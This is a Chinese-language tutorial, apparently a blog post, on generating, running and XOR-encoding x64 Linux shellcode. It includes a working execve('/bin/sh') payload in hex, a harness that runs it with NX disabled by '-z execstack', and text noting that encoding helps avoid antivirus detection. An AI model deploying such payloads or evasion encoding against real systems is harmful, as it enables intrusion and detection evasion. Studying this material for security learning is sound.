ShellCode

0x00 引言

  ShellCode实际上可以理解为是一个函数，他可以是在溢出攻击中需要被异常执行的函数，他可以是注入攻击中需要被热更新的hook函数，他甚至可以是恶意进程中需要被执行的核心函数。
  ShellCode之所以包含Shell这个关键字，因为在正规的入侵链中，黑客通常需要目标机器执行ShellCode以得到其终端。此Shell既可以是目标机器本地Shell，也可以是反弹到攻击机器的远程Shell。
  ShellCode通常有以下三种存在形式: C生成的ELF文件、汇编生成的.asm文件以及纯十六进制的.bin文件。
  而黑客偏爱十六进制ShellCode的原因，就是希望核心恶意代码既小又可执行(这允许它在尽可能广泛的情况下使用)。比如我们可以为他加壳、使他作为数据动态地加载到进程中，这样就更不容易被杀软发现。

0x01 ShellCode生成

  由于目前能力有限，这边只介绍两种简单的纯十六进制ShellCode生成方法。

1 C/C++与objdump
2 ShellCode生成器

1、C/C++与objdump
  objdump是一款linux下的反编译工具，下面以一个最简单的本地Shell获取代码为例介绍如何用该工具生成纯十六进制的ShellCode:

/* test.cpp */
#include <unistd.h>

int main()
{
    execve("/bin/sh", 0, 0);
 
    return 0;
}

  首先生成ELF文件，然后使用objdump生成ShellCode:

# 生成ELF文件
$ gcc test.cpp -o test

# 使用objdump生成ShellCode
# 打印的字符串即为ShellCode
$ objdump -d ./test |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

2、ShellCode生成器
  Github上可以找到ShellCode生成器，可以实现从C/C++代码生成汇编代码(.asm)或十六进制文件(.bin):

# 写入源txt文件
$ echo "execve(\"/bin/sh\", 0, 0);" > sh.txt

# 生成.asm与.bin文件
& ./ShellCodeGenerator -p linux_x64 -r sh.txt -a Assembly.asm -o Shellcode.bin

# 最后使用hex编辑器查看生成的Shellcode.bin文件

0x02 ShellCode运行

  为了测试上一步获取到的纯十六进制ShellCode的效果，除了直接使用上述生成器的’-t’参数，我们还可以直接写一个用于测试的.cpp文件:

/* test.cpp */
#include <stdio.h>
#include <string.h>

unsigned char code[]="\x48\x31\xc0\x48\xB8\x2F\x62\x69\x6e\x2f\x73\x68\x00\x50\x54\x48\x31\xd2\x48\x31\xf6\x48\x8b\x3c\x24\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\x48\x83\xc4\x16";

int main()
{
    ((void(*)(void))&code)();
    return 0;
}

  上述的code变量即为生成的十六进制ShellCode，接下来测试其效果:

# 生成ELF文件
# code变量内容在数据段，由于NX保护机制存在，无法直接在数据段运行指令
# '-z execstack'参数可关闭NX保护机制
$ gcc -z execstack test.cpp -o test

# 测试
$ ./test 

0x03 ShellCode加密

  对ShellCode加密的方式很多，比如代码混淆、加密算法、虚拟化等。

1 xor加密

1、xor加密
  异或运算符’^’，可以用来判断两个值是否不同。

0 ^ 0 = 0
0 ^ 1 = 1
1 ^ 0 = 1
1 ^ 1 = 0

  异或运算的特点是，如果对一个值连续做两次xor，则会返回这个值本身。

# 1010异或后结果
1010 ^ 1111 = 0101

# 0101异或后结果
0101 ^ 1111 = 1010

  上述这种特性使得它可以用于信息的加密。同样也意味着，可以加密我们的十六进制ShellCode:

#include <stdlib.h>
#include <string.h>

#define KEY 0x86

unsigned char code[]="\x48\x31\xc0\x48\xB8\x2F\x62\x69\x6e\x2f\x73\x68\x00\x50\x54\x48\x31\xd2\x48\x31\xf6\x48\x8b\x3c\x24\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\x48\x83\xc4\x16";

unsigned char* algorithm_xor(const unsigned char str[], int size)
{
    unsigned char encode_str[size];
    for (int i = 0; i < size; ++i)
    {
        encode_str[i] =  str[i] ^ KEY;
    }

    unsigned char* ret = (unsigned char *)malloc(size);
    memcpy(ret, encode_str, size);

    return ret;
}

int main()
{
    unsigned char* encode_str;
    encode_str = algorithm_xor(code, sizeof(code));

    return 0;
}

0x04 引用文献

[1]https://github.com/NytroRST/ShellcodeCompiler